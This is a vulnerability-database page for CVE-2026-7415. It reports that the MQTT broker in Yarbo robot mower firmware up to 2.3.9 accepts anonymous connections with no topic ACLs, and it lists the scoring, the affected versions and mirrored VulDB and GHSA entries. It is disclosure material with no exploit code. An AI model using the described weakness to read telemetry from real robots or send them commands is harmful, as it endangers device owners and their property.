CVE-2026-7415
published 2026-05-07CVE-2026-7415: The MQTT broker embedded in Yarbo firmware v2.3.9 is configured to allow anonymous connections with no topic-level read or write ACLs. Any host on the same…
PriorityP261critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
EPSS
0.54%
41.5th percentile
The MQTT broker embedded in Yarbo firmware v2.3.9 is configured to allow anonymous connections with no topic-level read or write ACLs. Any host on the same network can subscribe to sensitive telemetry topics or publish control messages directly to the robot without authentication or authorization of any kind.
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| yarbo | firmware | <= 2.3.9 | — |
| yarbo | lawn_mower_firmware | — | — |
| yarbo | lawn_mower_pro_firmware | — | — |
Stop checking back — get the weekly exploitation signal.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
VulDB
Yarbo up to 2.3.9 MQTT Broker missing authentication
vuldb·2026-05-07·CVSS 9.8
CVE-2026-7415 [CRITICAL] Yarbo up to 2.3.9 MQTT Broker missing authentication
A vulnerability described as critical has been identified in Yarbo up to 2.3.9. Affected by this issue is some unknown functionality of the component MQTT Broker. Executing a manipulation can lead to missing authentication.
This vulnerability is tracked as CVE-2026-7415. The attack is only possible within the local network. No exploit exists.
GHSA
GHSA-5jxr-5v22-49gf: The MQTT broker embedded in Yarbo firmware v2
ghsa_unreviewed·2026-05-07
CVE-2026-7415 [CRITICAL] CWE-306 GHSA-5jxr-5v22-49gf: The MQTT broker embedded in Yarbo firmware v2
The MQTT broker embedded in Yarbo firmware v2.3.9 is configured to allow anonymous connections with no topic-level read or write ACLs. Any host on the same network can subscribe to sensitive telemetry topics or publish control messages directly to the robot without authentication or authorization of any kind.
No detection rules found.
No public exploits indexed.
No writeups or analysis indexed.
2026-05-07
Published